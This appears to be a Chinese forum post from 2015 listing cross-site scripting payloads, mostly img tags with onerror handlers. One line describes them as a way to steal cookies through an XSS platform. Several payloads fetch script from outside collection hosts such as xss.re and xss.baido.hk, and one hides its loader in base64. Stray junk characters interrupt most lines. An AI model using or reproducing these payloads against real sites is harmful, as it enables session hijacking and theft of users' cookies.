<img src='non-exist.jpg'onerror="alert('xss')">
: A! B5 d3 m. i9 e<img src=# onerror=alert(123)>! i6 I* w; C0 P9 J* T
<img src=# onerror=alert(document.cookie)>
3 q+ H7 G) i# D- \下面是利用平台钓cookie的- E: S) K4 [# j8 U' A
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>( E; D! f7 W/ A. J8 ~
; ~& B/ P3 B/ @
+ d9 e" D1 k: A; r
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>* _$ {2 i/ ]2 P$ [: V% s( B" _
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>- r2 s" e" a+ G) k+ A* G: Q
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
2 u* |" J. s0 t9 k; `: B0 E<img src=1 onerror=jQuery.getScript("//xss.re/974")> ! O& n- L4 _# `1 z. o& h' b
<img src="#">9 c+ j6 Y# L( n
<img src="#">
/ g3 T9 H. p/ T) G; w; Y<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>5 _9 r4 Z- B& l
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
' z" k L5 H$ X( M, C<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>- X4 @4 J7 V5 r: G# B2 W
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
/ y' q/ J$ u1 p- z<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
: g& F4 y- j% W- D<img src=x width="0" height="0"></img># M/ f# L: u8 A) J T
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>4 m- Z3 g% B0 C; i t- j
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
! r3 U& f0 H; h. } |
发表于 2015-10-18 14:33:54
收藏
支持
反对